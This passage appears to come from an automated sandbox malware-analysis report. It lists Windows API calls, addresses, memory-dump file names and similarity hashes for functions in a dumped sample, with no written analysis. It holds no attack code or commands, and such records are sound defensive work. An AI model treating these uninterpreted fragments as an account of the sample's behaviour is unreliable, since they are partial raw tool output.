                                                                                                                                        • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2864067406-0
                                                                                                                                        • Opcode ID: 19fdf42f10358c7a41d9f74a84a404568839711141f6da80958dbe72b6a2a36b
                                                                                                                                        • Instruction ID: 09ef66112ba4ca53210ac65af05e2f48f1dec07b8209f3a833bd81a617de67ba
                                                                                                                                        • Opcode Fuzzy Hash: 19fdf42f10358c7a41d9f74a84a404568839711141f6da80958dbe72b6a2a36b
                                                                                                                                        • Instruction Fuzzy Hash: 2C21BF31600018EFCB25DF98C898EFA7BF9EB4A350F504595FA0547261C7B19950DB60
                                                                                                                                        APIs
                                                                                                                                        • GetFileAttributesW.KERNEL32(?,00BBCB68), ref: 00B8D2FB
                                                                                                                                        • GetLastError.KERNEL32 ref: 00B8D30A
                                                                                                                                        • CreateDirectoryW.KERNEL32(?,00000000), ref: 00B8D319
                                                                                                                                        • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,00BBCB68), ref: 00B8D376
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CreateDirectory$AttributesErrorFileLast
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2267087916-0
                                                                                                                                        • Opcode ID: 45a49062686d8116602e4bc4ca3cfaebe3ea4128cbe4d78409800fa7a275ecf7
                                                                                                                                        • Instruction ID: eb8a9d0081d2158573288c2b63a2c18f9f80e5172917d48c3057c8dc17939db4
                                                                                                                                        • Opcode Fuzzy Hash: 45a49062686d8116602e4bc4ca3cfaebe3ea4128cbe4d78409800fa7a275ecf7
                                                                                                                                        • Instruction Fuzzy Hash: 7C21A1705083019F8710EF28D8818AEBBE4EE5A364F504A9EF499C72F1DB30D945CB97
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00B81014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00B8102A
                                                                                                                                          • Part of subcall function 00B81014: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00B81036
                                                                                                                                          • Part of subcall function 00B81014: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00B81045
                                                                                                                                          • Part of subcall function 00B81014: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00B8104C
                                                                                                                                          • Part of subcall function 00B81014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00B81062
                                                                                                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00B815BE
                                                                                                                                        • _memcmp.LIBVCRUNTIME ref: 00B815E1
                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00B81617
                                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 00B8161E
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1592001646-0
                                                                                                                                        • Opcode ID: 6c9e6ddc2a2097e1ed3f602e3bc1b1dbd576f8a7c58c0cb04ea69aeccfb9eecb
                                                                                                                                        • Instruction ID: d35346c43e2f9eaa54cded30604e3efed2132d619a7e5d0d3af2f72518aa4bed
                                                                                                                                        • Opcode Fuzzy Hash: 6c9e6ddc2a2097e1ed3f602e3bc1b1dbd576f8a7c58c0cb04ea69aeccfb9eecb
                                                                                                                                        • Instruction Fuzzy Hash: BF217A71E01109EFDB00EFA8C945BEEB7F8FF44344F184899E441AB251E770AA06CBA0
                                                                                                                                        APIs
                                                                                                                                        • GetWindowLongW.USER32(?,000000EC), ref: 00BB280A
                                                                                                                                        • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00BB2824
                                                                                                                                        • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00BB2832
                                                                                                                                        • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00BB2840
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Window$Long$AttributesLayered
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2169480361-0
                                                                                                                                        • Opcode ID: df245711144b00abbf3409b35e3058d23b7ccf1bb6a3ec48a81172a58ca86376
                                                                                                                                        • Instruction ID: 56006bf40a41a690bf7cfe5fce6bed2ebd7ede583e649e8238da4a4a63f7a8cd
                                                                                                                                        • Opcode Fuzzy Hash: df245711144b00abbf3409b35e3058d23b7ccf1bb6a3ec48a81172a58ca86376
                                                                                                                                        • Instruction Fuzzy Hash: 0E219031205511AFD714DB24DC55FBA7BD9EF59324F148298F42A8B6A2CBB1FC42C790
                                                                                                                                        APIs
                                                                                                                                        • InternetReadFile.WININET(?,?,00000400,?), ref: 00B9CE89
                                                                                                                                        • GetLastError.KERNEL32(?,00000000), ref: 00B9CEEA
                                                                                                                                        • SetEvent.KERNEL32(?,?,00000000), ref: 00B9CEFE
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorEventFileInternetLastRead
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 234945975-0
                                                                                                                                        • Opcode ID: bf03075ceecfb0834a89dba3dbe9fd88e6683ed324a3ed66dcaeece18326eafc
                                                                                                                                        • Instruction ID: ef33a67f0d2462d4b7993d2f7ffd195fa9cd4767ee5e1ee2a55a1dfaa1355c0d
                                                                                                                                        • Opcode Fuzzy Hash: bf03075ceecfb0834a89dba3dbe9fd88e6683ed324a3ed66dcaeece18326eafc
                                                                                                                                        • Instruction Fuzzy Hash: 30219D71500B05ABDB20DF65C988BA67FF8EB50354F1044AEE546D3151EB70EE089B64
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00B88D7D: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,00B8790A,?,000000FF,?,00B88754,00000000,?,0000001C,?,?), ref: 00B88D8C
                                                                                                                                          • Part of subcall function 00B88D7D: lstrcpyW.KERNEL32(00000000,?,?,00B8790A,?,000000FF,?,00B88754,00000000,?,0000001C,?,?,00000000), ref: 00B88DB2
                                                                                                                                          • Part of subcall function 00B88D7D: lstrcmpiW.KERNEL32(00000000,?,00B8790A,?,000000FF,?,00B88754,00000000,?,0000001C,?,?), ref: 00B88DE3
                                                                                                                                        • lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,00B88754,00000000,?,0000001C,?,?,00000000), ref: 00B87923
                                                                                                                                        • lstrcpyW.KERNEL32(00000000,?,?,00B88754,00000000,?,0000001C,?,?,00000000), ref: 00B87949
                                                                                                                                        • lstrcmpiW.KERNEL32(00000002,cdecl,?,00B88754,00000000,?,0000001C,?,?,00000000), ref: 00B87984
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: lstrcmpilstrcpylstrlen
                                                                                                                                        • String ID: cdecl
                                                                                                                                        • API String ID: 4031866154-3896280584
                                                                                                                                        • Opcode ID: 2c0c654841d53a351bc626c46e6cf9a951bc599865f7f4d6570def6dfe3ee991
                                                                                                                                        • Instruction ID: 2c5fffd6fcd85edd6971026d53a22041d73e978a1ec43320450142950769a8fd
                                                                                                                                        • Opcode Fuzzy Hash: 2c0c654841d53a351bc626c46e6cf9a951bc599865f7f4d6570def6dfe3ee991
                                                                                                                                        • Instruction Fuzzy Hash: 7E11063A200202BBCB15AF39C844D7A77E9FF45394B60406AF842C7274EF71D801C751
                                                                                                                                        APIs
                                                                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00BB7D0B
                                                                                                                                        • SetWindowLongW.USER32(00000000,000000F0,?), ref: 00BB7D2A
                                                                                                                                        • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00BB7D42
                                                                                                                                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00B9B7AD,00000000), ref: 00BB7D6B
                                                                                                                                          • Part of subcall function 00B39BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00B39BB2
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Window$Long
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 847901565-0
                                                                                                                                        • Opcode ID: fb9bf155ab8110f4206de021bf290dd388c9c5670c63f5ca96a7b214ac1ff1d7
                                                                                                                                        • Instruction ID: f0a9b7db330ac859f883a7b532da84ce1dfe35db52f64f800a125c9e7cbff9cf
                                                                                                                                        • Opcode Fuzzy Hash: fb9bf155ab8110f4206de021bf290dd388c9c5670c63f5ca96a7b214ac1ff1d7
                                                                                                                                        • Instruction Fuzzy Hash: 3C1193715446159FCB109F28CC04AB63BE5EF853A0B258764F835D71F0DBB19951CB50
                                                                                                                                        APIs
                                                                                                                                        • SendMessageW.USER32(?,00001060,?,00000004), ref: 00BB56BB
                                                                                                                                        • _wcslen.LIBCMT ref: 00BB56CD
                                                                                                                                        • _wcslen.LIBCMT ref: 00BB56D8
                                                                                                                                        • SendMessageW.USER32(?,00001002,00000000,?), ref: 00BB5816
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessageSend_wcslen
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 455545452-0
                                                                                                                                        • Opcode ID: 05e856f3318ff0b364f2822c6b95b59c9e6eb52e22c1f33398eef35164e28644
                                                                                                                                        • Instruction ID: 235e1a2d6dde556f665b257f45b46082111c7fbb2265c504709bf8b494d5261d
                                                                                                                                        • Opcode Fuzzy Hash: 05e856f3318ff0b364f2822c6b95b59c9e6eb52e22c1f33398eef35164e28644
                                                                                                                                        • Instruction Fuzzy Hash: 0311AC71A00618ABDB309F658CC5BFE77ECEB10764B1045A6F91696181EBF09A84CB62
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 10781748051735d53586529438954e38944502a92234684d09972c232434e607
                                                                                                                                        • Instruction ID: ded65b62db92d9178788d7feec72aeba57db8156ea63351220dce672d6642040
                                                                                                                                        • Opcode Fuzzy Hash: 10781748051735d53586529438954e38944502a92234684d09972c232434e607
                                                                                                                                        • Instruction Fuzzy Hash: 700144B22056167EF611267C6CC1F6766ADDF413BAB340BF5FD31612D2DBA09C485170
                                                                                                                                        APIs
                                                                                                                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 00B81A47
                                                                                                                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00B81A59
                                                                                                                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00B81A6F
                                                                                                                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00B81A8A
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessageSend
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3850602802-0
                                                                                                                                        • Opcode ID: e7a4f17cffe7fafd249abb1739ba5628f80d40ee6c840eaa62383d1b0f913f76
                                                                                                                                        • Instruction ID: a725118957b148471bd8a760a5852a510d41526b7c2006e98b01fd6dbbfac3e0
                                                                                                                                        • Opcode Fuzzy Hash: e7a4f17cffe7fafd249abb1739ba5628f80d40ee6c840eaa62383d1b0f913f76
                                                                                                                                        • Instruction Fuzzy Hash: 0B113C3AD01219FFEB10DFA8CD85FADBBB8EB08750F200491E610B7290D6716E51DB94
                                                                                                                                        APIs
                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00B8E1FD
                                                                                                                                        • MessageBoxW.USER32(?,?,?,?), ref: 00B8E230
                                                                                                                                        • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00B8E246
                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00B8E24D
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2880819207-0
                                                                                                                                        • Opcode ID: bd0634692ec6a3874b80d8412735b9091d1ff342ec643c7c0cbf6a942e5eb168
                                                                                                                                        • Instruction ID: d14e806a6191ca64caf845f6695891bc72c9859b5437e9bc4d0bcccd8c554055
                                                                                                                                        • Opcode Fuzzy Hash: bd0634692ec6a3874b80d8412735b9091d1ff342ec643c7c0cbf6a942e5eb168
                                                                                                                                        • Instruction Fuzzy Hash: E911A176904254BBC701EFACDC49AAA7FEDEB45320F1446A5F924E32A1DAB0C904C7A0
                                                                                                                                        APIs
                                                                                                                                        • CreateThread.KERNEL32(00000000,?,00B4CFF9,00000000,00000004,00000000), ref: 00B4D218
                                                                                                                                        • GetLastError.KERNEL32 ref: 00B4D224
                                                                                                                                        • __dosmaperr.LIBCMT ref: 00B4D22B
                                                                                                                                        • ResumeThread.KERNEL32(00000000), ref: 00B4D249
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Thread$CreateErrorLastResume__dosmaperr
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 173952441-0
                                                                                                                                        • Opcode ID: 87f0b599e7421d31a97921e5619706e9fac2c3c989a8e67d33d278456320f798
                                                                                                                                        • Instruction ID: 9f9fd4d6b5be9b7a47dbc6985d7e7a80745053db7c8778200d44f8c63ed37554
                                                                                                                                        • Opcode Fuzzy Hash: 87f0b599e7421d31a97921e5619706e9fac2c3c989a8e67d33d278456320f798
                                                                                                                                        • Instruction Fuzzy Hash: 7601D236805214BBCB119BA5DC09BAE7EE9DF81731F100399F925A31D0CFB0CA05E6A1
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00B39BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00B39BB2
                                                                                                                                        • GetClientRect.USER32(?,?), ref: 00BB9F31
                                                                                                                                        • GetCursorPos.USER32(?), ref: 00BB9F3B
                                                                                                                                        • ScreenToClient.USER32(?,?), ref: 00BB9F46
                                                                                                                                        • DefDlgProcW.USER32(?,00000020,?,00000000,?,?,?), ref: 00BB9F7A
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Client$CursorLongProcRectScreenWindow
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4127811313-0
                                                                                                                                        • Opcode ID: 0fe657eea22c463cec20b6b1268b7f89e0e0c259e2aab3c9e81ad7fd2f7aaa5c
                                                                                                                                        • Instruction ID: 004d33ce4653b503561b57c6953815d299b3ce4917c7287c138eee2aff5b0d64
                                                                                                                                        • Opcode Fuzzy Hash: 0fe657eea22c463cec20b6b1268b7f89e0e0c259e2aab3c9e81ad7fd2f7aaa5c
                                                                                                                                        • Instruction Fuzzy Hash: B911183290011AEBDB10DFA8D8859FE7BB9FB46321F504595FA11E3151DBB0BA81CBA1
                                                                                                                                        APIs
                                                                                                                                        • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00B2604C
                                                                                                                                        • GetStockObject.GDI32(00000011), ref: 00B26060
                                                                                                                                        • SendMessageW.USER32(00000000,00000030,00000000), ref: 00B2606A
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CreateMessageObjectSendStockWindow
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3970641297-0
                                                                                                                                        • Opcode ID: 135a8d024c38ae724cd23e663f4ca690a22be02db501f76ae410ffd0ad98f748
                                                                                                                                        • Instruction ID: c2225df27a7fb2bbf0d5ab5bf6ed6fcbfb47fb5bdac0266b6916714460d0342b
                                                                                                                                        • Opcode Fuzzy Hash: 135a8d024c38ae724cd23e663f4ca690a22be02db501f76ae410ffd0ad98f748
                                                                                                                                        • Instruction Fuzzy Hash: A9118E72101518BFEF168FA49C84EEB7FA9EF09354F000241FA0852010CB769C60EBA0
                                                                                                                                        APIs
                                                                                                                                        • ___BuildCatchObject.LIBVCRUNTIME ref: 00B43B56
                                                                                                                                          • Part of subcall function 00B43AA3: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 00B43AD2
                                                                                                                                          • Part of subcall function 00B43AA3: ___AdjustPointer.LIBCMT ref: 00B43AED
                                                                                                                                        • _UnwindNestedFrames.LIBCMT ref: 00B43B6B
                                                                                                                                        • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00B43B7C
                                                                                                                                        • CallCatchBlock.LIBVCRUNTIME ref: 00B43BA4
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 737400349-0
                                                                                                                                        • Opcode ID: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
                                                                                                                                        • Instruction ID: 1629f0f6be5e78c3517a5d08a21ec220dee4b5c4fe388acadeafb5b53ad5c30c
